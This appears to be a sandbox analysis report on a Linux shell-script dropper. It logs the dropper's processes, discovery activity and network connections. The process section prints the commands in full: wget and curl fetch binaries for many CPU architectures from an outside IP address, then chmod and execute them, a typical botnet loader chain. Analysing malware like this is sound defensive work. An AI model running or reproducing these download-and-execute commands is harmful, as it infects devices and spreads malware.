File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh N/A

Processes

/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh

[/tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.x86]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.x86]

/bin/cat

[cat UnHAnaAW.x86]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mips]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mips]

/bin/cat

[cat UnHAnaAW.mips]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.mpsl]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl]

/bin/cat

[cat UnHAnaAW.mpsl]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm4]

/bin/cat

[cat UnHAnaAW.arm4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-42d3a74da0534226a95c59cd6538176e-systemd-timedated.service-k76KCm]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm5]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm5]

/bin/cat

[cat UnHAnaAW.arm5]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm6]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm6]

/bin/cat

[cat UnHAnaAW.arm6]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.arm7]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.arm7]

/bin/cat

[cat UnHAnaAW.arm7]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.ppc]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.ppc]

/bin/cat

[cat UnHAnaAW.ppc]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.m68k]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.m68k]

/bin/cat

[cat UnHAnaAW.m68k]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://89.22.230.162/bins/UnHAnaAW.sh4]

/usr/bin/curl

[curl -O http://89.22.230.162/bins/UnHAnaAW.sh4]

/bin/cat

[cat UnHAnaAW.sh4]

/bin/chmod

[chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp
NL 89.22.230.162:80 tcp

Files

N/A